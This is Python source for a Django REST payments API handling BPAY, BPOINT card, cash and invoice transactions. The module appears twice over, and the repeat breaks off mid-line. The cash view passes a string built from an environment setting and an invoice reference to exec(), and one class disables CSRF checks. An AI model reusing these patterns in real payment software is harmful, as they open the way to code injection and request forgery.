serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') payment_date = serializers.DateTimeField(source='p_date', format='%Y-%m-%d %H:%M:%S') reason_for_refund_or_reversal = serializers.SerializerMethodField() class Meta: model = BpayTransaction fields = ( "id", "created", "amount", "type", "cheque_num", "crn", "txn_ref", "service_code", "payment_instruction", "payment_method", "payment_date", "entry_method", "orig_ref_num", "reason_for_refund_or_reversal", "discretionary_data", "payer_name", "country", "state", "car", "discount_ref", "discount_method", "approved", "matched", "linked", "biller_code" ) def get_type(self, obj): return dict(BpayTransaction.TRANSACTION_TYPE).get(obj.type) def get_payment_instruction(self, obj): return dict(BpayTransaction.PAYMENT_INSTRUCTION_CODES).get(obj.p_instruction_code) def get_payment_method(self, obj): return dict(BpayTransaction.PAYMENT_METHOD_CODES).get(obj.p_method_code) def get_entry_method(self, obj): return dict(BpayTransaction.ENTRY_METHODS).get(obj.entry_method) def get_reason_for_refund_or_reversal(self, obj): return dict(BpayTransaction.REF_REV_CODE).get(obj.ref_rev_code) class BpayTransactionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayTransaction.objects.all() serializer_class = BpayTransactionSerializer renderer_classes = (JSONRenderer,) search_fields = ( '=crn', ) def list(self, request, *args, **kwargs): queryset = self.get_queryset() sorting = request.GET.get('sorting',None) if sorting and sorting.lower() == 'unmatched': queryset = [q for q in queryset if not q.matched] serializer = self.get_serializer(queryset,many=True) return Response(serializer.data) class BpayFileSerializer(serializers.ModelSerializer): #date_modifier = serializers.SerializerMethodField() transactions = BpayTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') class Meta: model = BpayFile fields = ( "id", "inserted", 
"created", "file_id", #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", "transactions" ) def get_date_modifier(self, obj): return dict(BpayFile.DATE_MODIFIERS).get(obj.date_modifier) class BpayCollectionSerializer(serializers.ModelSerializer): created = serializers.DateField(source='date') number_of_files = serializers.IntegerField(source='count') class Meta: model = BpayCollection fields = ( 'created', 'number_of_files', 'credit_total', 'cheque_total', 'debit_total', 'total' ) def __init__(self,*args,**kwargs): try: txn_only = kwargs.pop("txns_only") except: txn_only = False super(BpayCollectionSerializer,self).__init__(*args, **kwargs) if txn_only: self.fields['transactions'] = BpayTransactionSerializer(many=True,read_only=True) else: self.fields['files'] = BpayFileSerializer(many=True) class BpayCollectionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayCollection.objects.all() serializer_class = BpayCollectionSerializer renderer_classes = (JSONRenderer,) lookup_field = 'created' def retrieve(self, request, created=None, format=None): try: instance = BpayCollection.objects.get(date=created) txns_only = bool(request.GET.get('transactions',False)) serializer = BpayCollectionSerializer(instance,txns_only=txns_only) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) class BpayFileList(viewsets.ReadOnlyModelViewSet): queryset = BpayFile.objects.all() serializer_class = BpayFileSerializer renderer_classes = (JSONRenderer,) ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # 
####################################################### class BpointTransactionSerializer(serializers.ModelSerializer): order = serializers.CharField(source='order.number') cardtype = serializers.SerializerMethodField() settlement_date = serializers.DateField(format='%B, %d %Y') source = serializers.CharField(source='type') crn = serializers.CharField(source='crn1') last_digits = serializers.SerializerMethodField() def get_cardtype(self, obj): return dict(BpointTransaction.CARD_TYPES).get(obj.cardtype) def get_last_digits(self,obj): return obj.last_digits class Meta: model = BpointTransaction fields = ( 'id', 'action', 'crn', 'source', 'amount', 'amount_surcharge', 'cardtype', 'order', 'txn_number', 'original_txn', 'receipt_number', 'response_code', 'response_txt', 'processed', 'settlement_date', 'approved', 'last_digits', 'refundable_amount' ) class AmountSerializer(serializers.Serializer): amount = serializers.DecimalField(max_digits=12, decimal_places=2) details = serializers.CharField(trim_whitespace=True) class BpointTransactionViewSet(viewsets.ModelViewSet): queryset = BpointTransaction.objects.all() serializer_class = BpointTransactionSerializer renderer_classes = (JSONRenderer,) def create(self,request): pass @detail_route(methods=['POST']) def refund(self,request,*args,**kwargs): try: http_status = status.HTTP_200_OK instance = self.get_object() serializer = AmountSerializer(data=request.data) serializer.is_valid(raise_exception=True) refund = instance.refund(serializer.validated_data,request.user) invoice = Invoice.objects.get(reference=instance.crn1) update_payments(invoice.reference) serializer = BpointTransactionSerializer(refund) return Response(serializer.data,status=http_status) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class CardSerializer(serializers.Serializer): cardholdername = serializers.CharField(required=False,max_length=50) number = 
serializers.CharField(min_length=13,max_length=16) cvn = serializers.CharField(min_length=3,max_length=4) expiry = serializers.DateField(input_formats=['%m%Y',]) class BpointPaymentSerializer(serializers.Serializer): invoice = serializers.CharField(max_length=50) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) card = CardSerializer(required=False) using_token = serializers.BooleanField(default=False) token = serializers.CharField(max_length=16, required=False) original_txn = serializers.CharField(max_length=50,required=False) action = serializers.ChoiceField(choices=BpointTransaction.ACTION_TYPES, default='payment') subtype = serializers.ChoiceField(choices=BpointTransaction.SUB_TYPES,default='single') type = serializers.ChoiceField(choices=BpointTransaction.TRANSACTION_TYPES) def validate(self, data): if data.get('using_token') and data.get('token') and data.get('card'): raise serializers.ValidationError("You can only use one method to make payments ie 'card' or 'token'.") if data['action'] in ['payment','preauth','unmatched_refund'] and not data.get('using_token') and not data.get('card'): raise serializers.ValidationError("For the selected action you need to provide 'card' details.") if data['action'] in ['payment','preauth','unmatched_refund'] and data.get('using_token') and not data.get('token'): raise serializers.ValidationError("You need to supply a stored card token if you are paying using the token.") if data['action'] in ['refund','capture','reversal'] and not data.get('original_txn'): raise serializers.ValidationError("For the selected action you need to provide the transaction number of the transaction matched to this one.") return data class BpointPaymentCreateView(generics.CreateAPIView): ''' Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": 
"052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } ''' serializer_class = BpointPaymentSerializer renderer_classes = (JSONRenderer,) class Bankcard(object): def __init__(self,number,cvn,expiry,name=None): self.name = name self.number = number self.cvn = cvn self.expiry = expiry def create(self, request): try: http_status = status.HTTP_200_OK #parse and validate data serializer = BpointPaymentSerializer(data=request.data) serializer.is_valid(raise_exception=True) txn,res,card, invoice_number, total,original_txn, reference = None, None, None, None, None, None, None # Get the optional paramters for the transaction if serializer.validated_data.get('amount'): total = serializer.validated_data['amount'] if serializer.validated_data.get('original_txn'): original_txn = serializer.validated_data['original_txn'] #Get card details if it is there if serializer.validated_data.get('card'): card_data = serializer.validated_data['card'] card = self.Bankcard( card_data.get('number'), card_data.get('cvn'), card_data.get('expiry').strftime("%m%Y") ) # Check if the invoice exists if action is payment,preauth try: inv = Invoice.objects.get(reference=serializer.validated_data['invoice']) reference = inv.reference except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") if not total and serializer.validated_data['action'] in ['payment','preauth','unmatched_refund']: total = inv.amount # intialize the bpoint facade object facade = bpoint_facade if card: # Create card form data form_data = { 'expiry_month_0': card.expiry[:2], 'expiry_month_1': card.expiry[2:], 'ccv': card.cvn, 'number': card.number } # Validate card data using BankcardForm from oscar payments bankcard_form = forms.BankcardForm(form_data) if not bankcard_form.is_valid(): errors = bankcard_form.errors for e in errors: raise 
serializers.ValidationError(errors.get(e)[0]) txn = facade.post_transaction( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], inv.order_number, reference, total, bankcard_form.bankcard, original_txn ) elif serializer.validated_data.get('using_token'): # Get the token try: token = BpointToken.objects.get(id=serializer.validated_data.get('token')) except BpointToken.DoesNotExist: raise serializers.ValidationError("The selected stored card doesn't exist.") txn = facade.pay_with_storedtoken( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], serializer.validated_data.get('token'), inv.order_number, reference, total, original_txn ) res = BpointTransactionSerializer(BpointTransaction.objects.get(txn_number=txn.txn_number)) return Response(res.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### class CashSerializer(serializers.ModelSerializer): original_txn = serializers.CharField(required=False) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) details = serializers.CharField(allow_null=True,allow_blank=True,required=False) invoice = serializers.CharField(source='invoice.reference') external = serializers.BooleanField(default=False) region = serializers.CharField(required=False) district = serializers.CharField(required=False) class Meta: model = CashTransaction fields = ( 'invoice', 'amount', 'source', 'created', 'type', 'external', 'region', 'district', 'receipt', 'original_txn', 'details' ) def validate(self,data): if data['external'] and not (data.get('region') or data.get('district')): raise 
serializers.ValidationError('A region/district must be specified for an external payment.') if data['type'] == 'refund' and not data['details']: raise serializers.ValidationError('details are required for a refund') return data class CashViewSet(viewsets.ModelViewSet): '''Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } ''' queryset = CashTransaction.objects.all() serializer_class = CashSerializer def create(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data serializer = CashSerializer(data=request.data) serializer.is_valid(raise_exception=True) invoice,txn = None, None #Check if the invoice being paid for exists # Check if the invoice exists if action is payment,preauth try: invoice = Invoice.objects.get(reference=serializer.validated_data['invoice']['reference']) serializer.validated_data['invoice'] = invoice except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") # Check if the amount was specified otherwise pay the whole amount if not serializer.validated_data.get('amount'): serializer.validated_data['amount'] = invoice.amount with transaction.atomic(): txn = serializer.save() if txn.type == 'refund': TrackRefund.objects.create(user=request.user,type=1,refund_id=txn.id,details=serializer.validated_data['details']) send_refund_email(invoice,'manual',txn.amount) update_payments(invoice.reference) LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE =env('LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE', '') if len(LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE) != 0: try: ltc = LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE.split(":") exec('import '+str(ltc[0])) exec(ltc[1]+"('"+invoice.reference+"')") except Exception as e: print (e) http_status = status.HTTP_201_CREATED serializer = CashSerializer(txn) return Response(serializer.data,status=http_status) except 
serializers.ValidationError: raise except ValidationError as e: raise serializers.ValidationError(str(''.join(e.error_dict.values()[0][0]))) except Exception as e: raise serializers.ValidationError(str(e[0])) class DistrictSerializer(serializers.ModelSerializer): name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = District fields = ('name','code') def get_name(self, obj): return dict(DISTRICT_CHOICES).get(obj.name) class RegionSerializer(serializers.ModelSerializer): districts = DistrictSerializer(many=True) name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = Region fields = ( 'name', 'code', 'districts' ) def get_name(self, obj): return dict(REGION_CHOICES).get(obj.name) class RegionViewSet(viewsets.ReadOnlyModelViewSet): queryset = Region.objects.all() serializer_class = RegionSerializer lookup_field = 'name' ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### class InvoiceTransactionSerializer(serializers.ModelSerializer): cash_transactions=CashSerializer(many=True) bpay_transactions=BpayTransactionSerializer(many=True) bpoint_transactions=BpointTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') owner = serializers.CharField(source='owner.email') refundable_cards=BpointTransactionSerializer(many=True) class Meta: model = Invoice fields = ( 'id', 'owner', 'voided', 'order_number', 'num_items', 'amount', 'reference', 'created', 'balance', 'refundable', 'refundable_amount', 'single_card_payment', 'payment_amount', 'payment_status', 'cash_transactions', 'bpay_transactions', 'bpoint_transactions', 'refundable_cards' ) read_only_fields=( 'created', 'id', 'num_items' ) class 
BpayLinkSerializer(serializers.Serializer): bpay = serializers.IntegerField() link = serializers.BooleanField(default=True) def validate_bpay(self,val): try: BpayTransaction.objects.get(id=val) except BpayTransaction.DoesNotExist: raise serializers.ValidationError('The bpay transaction entered does not exist.') return val class InvoiceTransactionViewSet(viewsets.ModelViewSet): queryset = Invoice.objects.all() serializer_class = InvoiceTransactionSerializer lookup_field = 'reference' @detail_route(methods=['get']) def linked_bpay(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) @detail_route(methods=['get']) def payments(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions payments = [] #cash cash = invoice.cash_transactions.all() for c in cash: payments.append( { 'date':c.created.strftime('%d/%m/%Y'), 'type':c.get_source_display().lower().title() if c.type != 'refund' else 'Manual', 'details':"{}{}".format(c.get_type_display().lower().title(),": {}".format(c.details) if c.details else ''), 'amount':'$ {}'.format(c.amount) if c.type not in ['refund','move_out'] else '$ -{}'.format(c.amount) }) #bpay bpay = invoice.bpay_transactions for b in bpay: payments.append( { 'date':b.p_date.strftime('%d/%m/%Y'), 'type': 'Bpay', 'details':b.get_p_instruction_code_display().lower().title(), 'amount':'$ {}'.format(b.amount) } ) #bpoint bpoint = invoice.bpoint_transactions.filter(response_code=0) for b in bpoint: payments.append( { 'date':b.processed.strftime('%d/%m/%Y'), 'type': 'Credit Card', 'details':b.get_action_display().lower().title(), 'amount':'$ {}'.format(b.amount) 
if b.action != 'refund' else '$ -{}'.format(b.amount) } ) return Response(payments) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(e) @detail_route(methods=['post']) def link(self, request, *args, **kwargs): try: invoice = self.get_object() serializer = BpayLinkSerializer(data=request.data) serializer.is_valid(raise_exception=True) bpay = BpayTransaction.objects.get(id=serializer.validated_data['bpay']) link = serializer.validated_data['link'] if link: if bpay.matched or bpay.linked: raise serializers.ValidationError('This BPAY transaction has already been linked to another invoice.') # Create a link between invoice and bpay txn try: InvoiceBPAY.objects.create(bpay=bpay,invoice=invoice) except Exception: raise else: # Delete the link between invoice and txn try: b= InvoiceBPAY.objects.get(bpay=bpay,invoice=invoice) b.delete() except Exception: raise # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### class ReportSerializer(serializers.Serializer): system = serializers.CharField(max_length=4) start = serializers.DateTimeField() end = serializers.DateTimeField() banked_start = serializers.DateTimeField(required=False,allow_null=True) banked_end = serializers.DateTimeField(required=False,allow_null=True) region = serializers.ChoiceField(required=False,allow_null=True,choices=REGION_CHOICES) district = 
serializers.ChoiceField(required=False,allow_null=True,choices=DISTRICT_CHOICES) items = serializers.BooleanField(default=False) '''def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value''' def validate(self,data): if data['items'] and not (data['banked_start'] and data['banked_end']): raise serializers.ValidationError('banked_start and banked_end are required for items csv. ') return data class ReportCreateView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: 
raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class ReportCreateAllocatedView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv_allocated(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) ####################################################### # # # /REPORTS # # # #######################################################
import json from django.db import transaction from django.conf import settings from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import get_template from django.core.exceptions import ValidationError from django.core.urlresolvers import reverse from wsgiref.util import FileWrapper from rest_framework import viewsets, serializers, status, generics, views from rest_framework.renderers import JSONRenderer from rest_framework.response import Response from rest_framework.authentication import SessionAuthentication from rest_framework.permissions import IsAuthenticated from rest_framework.decorators import list_route,detail_route from ledger.payments.bpay.models import BpayTransaction, BpayFile, BpayCollection from ledger.payments.invoice.models import Invoice, InvoiceBPAY from ledger.payments.bpoint.models import BpointTransaction, BpointToken from ledger.payments.cash.models import CashTransaction, Region, District, DISTRICT_CHOICES, REGION_CHOICES from ledger.payments.models import TrackRefund from ledger.payments.utils import systemid_check, update_payments from ledger.payments.facade import bpoint_facade from ledger.payments.reports import generate_items_csv, generate_trans_csv, generate_items_csv_allocated from ledger.payments.emails import send_refund_email from ledger.accounts.models import EmailUser from oscar.apps.order.models import Order from oscar.apps.payment import forms from confy import env import traceback import six class CsrfExemptSessionAuthentication(SessionAuthentication): def enforce_csrf(self, request): return ####################################################### # # # BPAY # # # ####################################################### class BpayTransactionSerializer(serializers.ModelSerializer): type = serializers.SerializerMethodField() payment_instruction = serializers.SerializerMethodField() payment_method = serializers.SerializerMethodField() entry_method = serializers.SerializerMethodField() created = 
serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') payment_date = serializers.DateTimeField(source='p_date', format='%Y-%m-%d %H:%M:%S') reason_for_refund_or_reversal = serializers.SerializerMethodField() class Meta: model = BpayTransaction fields = ( "id", "created", "amount", "type", "cheque_num", "crn", "txn_ref", "service_code", "payment_instruction", "payment_method", "payment_date", "entry_method", "orig_ref_num", "reason_for_refund_or_reversal", "discretionary_data", "payer_name", "country", "state", "car", "discount_ref", "discount_method", "approved", "matched", "linked", "biller_code" ) def get_type(self, obj): return dict(BpayTransaction.TRANSACTION_TYPE).get(obj.type) def get_payment_instruction(self, obj): return dict(BpayTransaction.PAYMENT_INSTRUCTION_CODES).get(obj.p_instruction_code) def get_payment_method(self, obj): return dict(BpayTransaction.PAYMENT_METHOD_CODES).get(obj.p_method_code) def get_entry_method(self, obj): return dict(BpayTransaction.ENTRY_METHODS).get(obj.entry_method) def get_reason_for_refund_or_reversal(self, obj): return dict(BpayTransaction.REF_REV_CODE).get(obj.ref_rev_code) class BpayTransactionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayTransaction.objects.all() serializer_class = BpayTransactionSerializer renderer_classes = (JSONRenderer,) search_fields = ( '=crn', ) def list(self, request, *args, **kwargs): queryset = self.get_queryset() sorting = request.GET.get('sorting',None) if sorting and sorting.lower() == 'unmatched': queryset = [q for q in queryset if not q.matched] serializer = self.get_serializer(queryset,many=True) return Response(serializer.data) class BpayFileSerializer(serializers.ModelSerializer): #date_modifier = serializers.SerializerMethodField() transactions = BpayTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') class Meta: model = BpayFile fields = ( "id", "inserted", 
"created", "file_id", #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", "transactions" ) def get_date_modifier(self, obj): return dict(BpayFile.DATE_MODIFIERS).get(obj.date_modifier) class BpayCollectionSerializer(serializers.ModelSerializer): created = serializers.DateField(source='date') number_of_files = serializers.IntegerField(source='count') class Meta: model = BpayCollection fields = ( 'created', 'number_of_files', 'credit_total', 'cheque_total', 'debit_total', 'total' ) def __init__(self,*args,**kwargs): try: txn_only = kwargs.pop("txns_only") except: txn_only = False super(BpayCollectionSerializer,self).__init__(*args, **kwargs) if txn_only: self.fields['transactions'] = BpayTransactionSerializer(many=True,read_only=True) else: self.fields['files'] = BpayFileSerializer(many=True) class BpayCollectionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayCollection.objects.all() serializer_class = BpayCollectionSerializer renderer_classes = (JSONRenderer,) lookup_field = 'created' def retrieve(self, request, created=None, format=None): try: instance = BpayCollection.objects.get(date=created) txns_only = bool(request.GET.get('transactions',False)) serializer = BpayCollectionSerializer(instance,txns_only=txns_only) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) class BpayFileList(viewsets.ReadOnlyModelViewSet): queryset = BpayFile.objects.all() serializer_class = BpayFileSerializer renderer_classes = (JSONRenderer,) ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # 
####################################################### class BpointTransactionSerializer(serializers.ModelSerializer): order = serializers.CharField(source='order.number') cardtype = serializers.SerializerMethodField() settlement_date = serializers.DateField(format='%B, %d %Y') source = serializers.CharField(source='type') crn = serializers.CharField(source='crn1') last_digits = serializers.SerializerMethodField() def get_cardtype(self, obj): return dict(BpointTransaction.CARD_TYPES).get(obj.cardtype) def get_last_digits(self,obj): return obj.last_digits class Meta: model = BpointTransaction fields = ( 'id', 'action', 'crn', 'source', 'amount', 'amount_surcharge', 'cardtype', 'order', 'txn_number', 'original_txn', 'receipt_number', 'response_code', 'response_txt', 'processed', 'settlement_date', 'approved', 'last_digits', 'refundable_amount' ) class AmountSerializer(serializers.Serializer): amount = serializers.DecimalField(max_digits=12, decimal_places=2) details = serializers.CharField(trim_whitespace=True) class BpointTransactionViewSet(viewsets.ModelViewSet): queryset = BpointTransaction.objects.all() serializer_class = BpointTransactionSerializer renderer_classes = (JSONRenderer,) def create(self,request): pass @detail_route(methods=['POST']) def refund(self,request,*args,**kwargs): try: http_status = status.HTTP_200_OK instance = self.get_object() serializer = AmountSerializer(data=request.data) serializer.is_valid(raise_exception=True) refund = instance.refund(serializer.validated_data,request.user) invoice = Invoice.objects.get(reference=instance.crn1) update_payments(invoice.reference) serializer = BpointTransactionSerializer(refund) return Response(serializer.data,status=http_status) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class CardSerializer(serializers.Serializer): cardholdername = serializers.CharField(required=False,max_length=50) number = 
serializers.CharField(min_length=13,max_length=16) cvn = serializers.CharField(min_length=3,max_length=4) expiry = serializers.DateField(input_formats=['%m%Y',]) class BpointPaymentSerializer(serializers.Serializer): invoice = serializers.CharField(max_length=50) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) card = CardSerializer(required=False) using_token = serializers.BooleanField(default=False) token = serializers.CharField(max_length=16, required=False) original_txn = serializers.CharField(max_length=50,required=False) action = serializers.ChoiceField(choices=BpointTransaction.ACTION_TYPES, default='payment') subtype = serializers.ChoiceField(choices=BpointTransaction.SUB_TYPES,default='single') type = serializers.ChoiceField(choices=BpointTransaction.TRANSACTION_TYPES) def validate(self, data): if data.get('using_token') and data.get('token') and data.get('card'): raise serializers.ValidationError("You can only use one method to make payments ie 'card' or 'token'.") if data['action'] in ['payment','preauth','unmatched_refund'] and not data.get('using_token') and not data.get('card'): raise serializers.ValidationError("For the selected action you need to provide 'card' details.") if data['action'] in ['payment','preauth','unmatched_refund'] and data.get('using_token') and not data.get('token'): raise serializers.ValidationError("You need to supply a stored card token if you are paying using the token.") if data['action'] in ['refund','capture','reversal'] and not data.get('original_txn'): raise serializers.ValidationError("For the selected action you need to provide the transaction number of the transaction matched to this one.") return data class BpointPaymentCreateView(generics.CreateAPIView): ''' Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": 
"052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } ''' serializer_class = BpointPaymentSerializer renderer_classes = (JSONRenderer,) class Bankcard(object): def __init__(self,number,cvn,expiry,name=None): self.name = name self.number = number self.cvn = cvn self.expiry = expiry def create(self, request): try: http_status = status.HTTP_200_OK #parse and validate data serializer = BpointPaymentSerializer(data=request.data) serializer.is_valid(raise_exception=True) txn,res,card, invoice_number, total,original_txn, reference = None, None, None, None, None, None, None # Get the optional paramters for the transaction if serializer.validated_data.get('amount'): total = serializer.validated_data['amount'] if serializer.validated_data.get('original_txn'): original_txn = serializer.validated_data['original_txn'] #Get card details if it is there if serializer.validated_data.get('card'): card_data = serializer.validated_data['card'] card = self.Bankcard( card_data.get('number'), card_data.get('cvn'), card_data.get('expiry').strftime("%m%Y") ) # Check if the invoice exists if action is payment,preauth try: inv = Invoice.objects.get(reference=serializer.validated_data['invoice']) reference = inv.reference except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") if not total and serializer.validated_data['action'] in ['payment','preauth','unmatched_refund']: total = inv.amount # intialize the bpoint facade object facade = bpoint_facade if card: # Create card form data form_data = { 'expiry_month_0': card.expiry[:2], 'expiry_month_1': card.expiry[2:], 'ccv': card.cvn, 'number': card.number } # Validate card data using BankcardForm from oscar payments bankcard_form = forms.BankcardForm(form_data) if not bankcard_form.is_valid(): errors = bankcard_form.errors for e in errors: raise 
serializers.ValidationError(errors.get(e)[0]) txn = facade.post_transaction( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], inv.order_number, reference, total, bankcard_form.bankcard, original_txn ) elif serializer.validated_data.get('using_token'): # Get the token try: token = BpointToken.objects.get(id=serializer.validated_data.get('token')) except BpointToken.DoesNotExist: raise serializers.ValidationError("The selected stored card doesn't exist.") txn = facade.pay_with_storedtoken( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], serializer.validated_data.get('token'), inv.order_number, reference, total, original_txn ) res = BpointTransactionSerializer(BpointTransaction.objects.get(txn_number=txn.txn_number)) return Response(res.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### class CashSerializer(serializers.ModelSerializer): original_txn = serializers.CharField(required=False) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) details = serializers.CharField(allow_null=True,allow_blank=True,required=False) invoice = serializers.CharField(source='invoice.reference') external = serializers.BooleanField(default=False) region = serializers.CharField(required=False) district = serializers.CharField(required=False) class Meta: model = CashTransaction fields = ( 'invoice', 'amount', 'source', 'created', 'type', 'external', 'region', 'district', 'receipt', 'original_txn', 'details' ) def validate(self,data): if data['external'] and not (data.get('region') or data.get('district')): raise 
serializers.ValidationError('A region/district must be specified for an external payment.') if data['type'] == 'refund' and not data['details']: raise serializers.ValidationError('details are required for a refund') return data class CashViewSet(viewsets.ModelViewSet): '''Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } ''' queryset = CashTransaction.objects.all() serializer_class = CashSerializer def create(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data serializer = CashSerializer(data=request.data) serializer.is_valid(raise_exception=True) invoice,txn = None, None #Check if the invoice being paid for exists # Check if the invoice exists if action is payment,preauth try: invoice = Invoice.objects.get(reference=serializer.validated_data['invoice']['reference']) serializer.validated_data['invoice'] = invoice except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") # Check if the amount was specified otherwise pay the whole amount if not serializer.validated_data.get('amount'): serializer.validated_data['amount'] = invoice.amount with transaction.atomic(): txn = serializer.save() if txn.type == 'refund': TrackRefund.objects.create(user=request.user,type=1,refund_id=txn.id,details=serializer.validated_data['details']) send_refund_email(invoice,'manual',txn.amount) update_payments(invoice.reference) LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE 